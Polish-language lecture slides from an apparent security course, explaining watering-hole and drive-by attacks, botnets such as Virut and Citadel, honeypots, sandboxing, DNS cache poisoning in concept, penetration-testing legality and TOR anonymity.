Watering Hole wodopój http://niebezpiecznik.pl/post/nowy-nieznany-do-tej-pory-atak-na-internet-explorer-8/ 29/12/2012 Kilka dni temu ktoś włamał się na stronę amerykańskiej organizacji Council on Foreign Relations i umieścił na stronie złośliwy kod JavaScript, który przy pomocy Adobe Flasha exploituje w pełni zapatchowane IE8 (technika heap spray) http://about-threats.trendmicro.com/relatedthreats.aspx?language=au&name=watering+hole+101 BSS - v2013 140

Drive-by download Drive-by download niezamierzone, nieświadome pobranie softu z Internetu: Pobranie autoryzowane przez użytkownika bez świadomości / zrozumienia konsekwencji (pobranie i instalacja nieznanego kodu ActiveX lub Java oraz trojany). Pobranie bez wiedzy użytkownika: wirusy, spyware, malware, crimeware. BSS - v2013 141

Botnet Botnet zbiór węzłów sieci (hostów) zainfekowanych złośliwym oprogramowaniem (podobnym do robaka, którego celem jest rozprzestrzenianie, niewidocznym dla użytkownika) dającym możliwość, jego twórcom, zdalnej kontroli nad wszystkimi zainfekowanymi węzłami. Zombie pojedynczy węzeł sieci botnet. Botnet = armia zombie. Typowe zastosowania: rozsyłanie spamu, ataki DDoS (Distributed Denial of Service), kradzież poufnych informacji, sabotaż, oszustwa, inwigilacja. http://zaufanatrzeciastrona.pl/post/kto-i-po-co-stworzyl-jeden-z-najbardziej-skomplikowanych-botnetow-w-historii/ BSS - v2013 142

Botnet NASK przejmuje domeny polskiego botnetu Virut Virut to botnet dzieło polskich programistów. Jego wielkość szacuje się na ok. 300 000 zainfekowanych maszyn, a botnet jest wykorzystywany do spamu, kradzieży danych i ataków DDoS. Swoje centrum dowodzenia miał w Polsce. Do dzisiaj NASK właśnie poinformował, że przejął 23 polskie domeny, które wykorzystywane były w atakch Virutem. Jest to pierwszy przypadek, w którym NASK decyduje się na tak drastyczne decyzje, jak siłowe odebranie domeny jej właścicielowi ale nie ulega wątpliwości, że w tym przypadku jest to słuszna i długo wyczekiwana decyzja. NASK do tej pory, w przeciwieństwie do innych registrarów nie nakładał żadnych sankcji na złośliwe domeny. Domeny Viruta wskazują obecnie na adres 148.81.111.111 należący do NASK-u. Z naszych informacji wynika, że już od kilku lat Virut był wnikliwie analizowany przez zespół CERT Polska. Dzięki temu ustalono, że C&C Viruta było utrzymywane m.in. na domenach zief.pl oraz ircgalaxy.pl, które dziś zostały wyłączone przez NASK. Techniką sinkholingu pozyskano także informację o 890 tysiącach unikalnych adresów IP zainfekowanych Virutem użytkowników. Na botnecie tej wielkości można uzyskać przychody rzędu 1 000 000 złotych w skali roku. 18/1/2013 http://niebezpiecznik.pl/post/nask-rozpoczyna-walke-z-botnetem-virut-i-przejmuje-jego-domeny/ BSS - v2013 143

Botnet Kontrowersje wokół akcji Microsoftu wymierzonej w botnet Citadel Kilka dni temu, szerokim echem odbiła się w mediach międzynarodowa operacja Microsoftu, której wynikiem było ubicie botnetu Citadel. Botnet wykradał pieniądze z kont bankowych przy pomocy złośliwego oprogramowania i sztuczek socjotechnicznych. Problem w tym, że oprócz przestępców stojących za botnetem oberwali także researcherzy, a sam Microsoft demontując botnet najprawdopodobniej złamał prawo w wielu krajach Microsoft rozłożył 1400 botnetów i przejął 4000 domen (sinkhollując je na swój adres IP). Akcja odbyła się równocześnie w 80 krajach. Niestety Microsoft przejmując domeny, przejął także kilkaset domen, które już wcześniej były przejęte i sinkhollowane przez innych researcherów, m.in. przez ekipę abuse.ch. Po rozmowach z innymi researcherami, okazuje się, że aż 1000 domen przejętych przez Microsoft w rzeczywistości nie należało do właścicieli Citadela, a do różnch bezpieczników Po akcji Microsoftu niestety nie będą one w stanie zbierać logów, a zatem Shadowserver przestanie informować administratorów o tym, że w ich podsieciach są zainfekowane hosty Co gorsza, okazuje się, że Microsoft przez swój sinkhole serwuje poprawny plik konfiguracyjny Citadela zainfekowanym hostom, który powoduje: zdjęcie blokady URL serwerów firm antywirusowych (to umożliwi ich aktualizację) zmianę IP serwerów C&C na microsoftowe Powyższe działanie pozornie korzystne dla użytkowników końcowych jest jednocześnie moralnie wątpliwe od lat w świecie bezpieczeństwa trwa debata, czy mając możliwość zdalnego wykonywania poleceń na zainfekowanych komputerach powinno się je siłowo i bez zgody/świadomości właściciela leczyć? 8/6/2013 http://niebezpiecznik.pl/post/kontrowersje-wokol-akcji-microsoftu-wymierzonej-w-botnet-citadel/ BSS - v2013 144

Honeypot Garnce miodu (ang. honeypot) Systemy tworzone jedynie w celu zbierania informacji o atakach na nie przeprowadzanych brak innych funkcji. Początek lat 90-tych trudne, uporczywe ataki wymagały podjęcia dodatkowych czynności aby określić intruza. Pierwszy publicznie dostępny honeypot: Deception Toolkit, przeznaczony dla systemów Unix-like zestaw skryptów napisanych w języku perl, symulujących znane usługi sieciowe wraz z wybranymi lukami dla zachęty dla atakujących. Powstało wiele projektów, od prostych aplikacji po rozbudowane systemy czy nawet całe sieci komputerowe. Współczesne honeypoty: Specter, Kfsensorczy PatriotBox (o zamkniętym kodzie źródłowym) oraz Honeyd, Nepenthes, Dionaea czy LaBrea (o otwartym kodzie źródłowym). http://securitymag.pl/honeypot-miodzio/ BSS - v2013 145

Honeypot W budowie honeypotów coraz częściej wykorzystuje się też oprogramowanie do wirtualizacji w połączeniu z oprogramowaniem monitorującym system i filtrującym ruch sieciowy. Istnieją też implementacje honeypotów dedykowane sieciom bezprzewodowym, takie jak fake ap czy honeyspot. Zwykle honeypoty klasyfikuje się ze względu na stopień interakcji, czyli na to, na ile pozwalają one atakującemu: wysoki stopień interakcji: uruchomienie rzeczywistego systemu lub systemu opartego o oprogramowanie do wirtualizacji, wzbogaconego o podsystem monitorowania akcji użytkowników w sposób dla nich możliwie niezauważalny czy też gotowe rozwiązania komercyjne jak Symantec Decoy Server, które de facto pozwalają na to samo przy znacznie mniejszym nakładzie pracy. Wady to wysoki koszt wdrożenia oraz groźba, iż stanie się, po przejęciu kontroli, przyczółkiem do ataku na istotne zasoby. niski stopień interakcji: prosta aplikacja lub skrypt, nasłuchujący na wyznaczonym porcie i symulujący działanie jakiejś usługi. Cel: zapisywanie możliwie najwięcej danych na temat połączeń, tj. czas, adres źródłowy, przesyłane dane itp. http://securitymag.pl/honeypot-miodzio/ BSS - v2013 146

Sandbox Sandbox jest jednym z mechanizmów zwiększających bezpieczeństwo poprzez separowanie uruchamianych programów. Często wykorzystywane do uruchamiania niezaufanego / podejrzanego kodu / programów pochodzących od stron trzecich, dostawców, niezaufanych użytkowników czy też stron internetowych. Typowo sandbox dostarcza ściśle kontrolowany zestaw zasobów (pamięć operacyjna i dyskowa, czas procesora) potrzebny do uruchomienia podejrzanego programu. Tak przygotowywane środowisko jest ściśle kontrolowane, pozwala poznać prawdziwą naturę programu. Wszelkie niebezpieczne działania jak dostęp do sieci, urządzeń IO, systemu operacyjnego są zabronione albo bardzo ograniczone / kontrolowane. Można powiedzieć, że sandbox to specyficzny przypadek wirtualizacji. BSS - v2013 147

DNS cache poisoning Typy serwerów: Authoritative (autorytatywne) Recursive (nieautorytatywne) Podstawa działania serwerów DNS: Jeśli serwer DNS Recursive nie zna adresu domeny pyta o niego serwer Authoritative dla tej domeny. Serwer Authoritative odpowiada a serwer Recursive zapamiętuje tę odpowiedź przez określony czas i udostępnia ją zainteresowanym. BSS - v2013 148

DNS cache poisoning Opis ataku: Atakujący zasypuje atakowany serwer Recursive zapytaniami o domeny podobne do 1q2w3e.mojbank.com. Serwer nie zna oczywiście odpowiedzi, pyta więc serwer Authoritative o dane domeny 1q2w3e.mojbank.com Z odpowiedzią spieszy atakujący zasypując atakowany serwer Recursive fałszywymi odpowiedziami (duża liczba zwiększa szanse odgadnięcia numeru portu i ID w zapytaniu DNS są to podstawowe mechanizmy bezpieczeństwa). Fałszywe odpowiedzi zwierają nie tylko adres dla domeny 1q2w3e.mojbank.com ale także adres fałszywego serwera DNS dla domeny, pod którą atakujący chce się podszyć. Teraz gdy przyjdzie zwykłe zapytanie o domenę mojbank.com zaatakowany serwer Recursive zwróci się o podanie jej adresu do intruza. BSS - v2013 149

DNS cache poisoning Bezpiecznie: gdy serwer jest Authoritative dla danej domeny. Zagrożenie: gdy serwer jest Recursive dla danej domeny ale porty wybierane są losowo. Wysokie zagrożenie: gdy serwer jest Recursive dla danej domeny i porty nie są wybierane losowo. BSS - v2013 150

Testy penetracyjne OWASP (Open Web Application Security Project) The Development Guide will show your project how to architect and build a secure application, the Code Review Guide will tell you how to verify the security of your application's source code, and this Testing Guide will show you how to verify the security of your running application 16th December, 2008 - OWASP Testing Guide, v3.0 15th February, 2013 - DRAFT New Testing Guide v4 Na niezamówione pentesty jest paragraf Tego typu czynności to łamanie prawa wykonując testy bezpieczeństwa bez zgody właściciela infrastruktury, wykonujesz je na własną odpowiedzialność i ryzykujesz zatrzymanie przez policję nawet jeśli swoimi odkryciami za darmo i bezinteresownie podzielisz się z właścicielem. Prawda jest taka, że po ujawnieniu twój los jest całkowicie w rękach właściciela sieci, do której się włamałeś a łatwo jest sobie wyobrazić, jaka jest pierwsza reakcja osoby, która dowiaduje się, że ktoś mógł np. czytać jej pocztę ;) http://niebezpiecznik.pl BSS - v2013 151

TOR TOR jest siecią składającą się z wirtualnych tuneli implementowanych w darmowym oprogramowaniu, które pozwala na zwiększenie prywatności i bezpieczeństwa użytkowników. W rzeczywistości każdy komputer, na którym zainstalowano oprogramowanie TOR, zachowuje się jak serwer Proxy, przy czym wszystkie serwery należące do sieci traktowane są jako grupa podlegająca wspólnym, ściśle określonym zasadom The Onion Routing (ang. trasowanie cebulowe). Podczas połączeń zestawiane są okresowo inne za każdym razem ścieżki, którymi wysyłane są pakiety za pośrednictwem wielu użytkowników sieci TOR. Ponadto wszystkie transmisje pomiędzy poszczególnymi peerami są osobno szyfrowane za wyjątkiem połączenia pomiędzy ostatnim węzłem danej ścieżki, a serwerem docelowym. BSS - v2013 152

TOR połączenie szyfrowane połączenie nieszyfrowane BSS - v2013 153

TOR Trasowanie realizowane jest w ten sposób, że każdy z węzłów biorących udział w przesyłaniu danych w obrębie jednej ścieżki posiada informacje jedynie o węźle, który przysłał jemu dane oraz o węźle, do którego on sam ma je wysłać. Testy pokazały, że kontrolowanie tylko 4% wszystkich węzłów sieci TOR pozwala na przechwycenie dowolnego pakietu z prawdopodobieństwem równym 50%. Sytuacja taka jest możliwa ponieważ w przypadku dużego ruchu sieciowego jest on kierowany do węzłów dysponujących łączem o dużej przepustowości. Ponadto możliwe także do przeprowadzenia są tzw. ataki czasowe. Zamiast starać się łamać szyfrowane połączenia lub podstawiać fałszywe węzły wystarczy nasłuchiwać ruch w obu kierunkach wszystkich węzłów brzegowych sieci obserwując jedynie ilość wysyłanych bądź odbieranych danych oraz czas, w którym takie operacje mają miejsce. Dzięki temu można ustalić zależność pomiędzy nadawcą pakietów, a ostatnim węzłem, który przekazuje je do serwera docelowego z pewnym opóźnieniem, a tym samym zidentyfikować klienta i jego działania w sieci. BSS - v2013 154

TOR Policja rekwiruje serwery, bo są węzłami TOR-a 20 letni Austriak, William Weber, musiał się tłumaczyć na komisariacie, że to nie on osobiście, a ktoś korzystający z zainstalowanego na jego serwerze TOR-a wszedł na polski serwer hostujący dziecięcą pornografię. I to tego kogoś, a nie Wiliama, policja powinna oskarżać o dystrybucję materiałów pedofilskich (za co grozi 10 lat więzienia). http://niebezpiecznik.pl/post/korzystal-z-tor-a-i-zabrali-mukomputery-przez-dziecieca-pornografie-na-polskim-serwerze/ BSS - v2013 155

TOR NSA Nigdy nie będziemy w stanie deanonimizować wszystkich użytkowników TOR-a przez cały czas http://niebezpiecznik.pl/post/tor-jest-bezpieczny-nsa-nie-daje-murady-ale/ BSS - v2013 156

TOR - Przykład BSS - v2013 157

TOR - Przykład BSS - v2013 158